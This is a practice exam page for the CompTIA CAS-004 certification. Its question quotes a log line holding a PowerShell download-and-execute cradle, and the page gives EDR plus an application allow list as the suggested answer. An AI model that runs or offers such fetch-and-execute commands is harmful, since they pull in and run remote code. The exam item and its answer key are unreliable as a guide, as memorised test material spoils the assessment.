ExamGecko
Question list
Search
Search

List of questions

Search

Related questions











Question 128 - CAS-004 discussion

Report
Export

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

A.
Antivirus and UEBA
Answers
A.
Antivirus and UEBA
B.
Reverse proxy and sandbox
Answers
B.
Reverse proxy and sandbox
C.
EDR and application approved list
Answers
C.
EDR and application approved list
D.
Forward proxy and MFA
Answers
D.
Forward proxy and MFA
Suggested answer: C

Explanation:

An EDR and whitelist should protect from this attack.

asked 02/10/2024
Tym Dom
41 questions
User
Your answer:
0 comments
Sorted by

Leave a comment first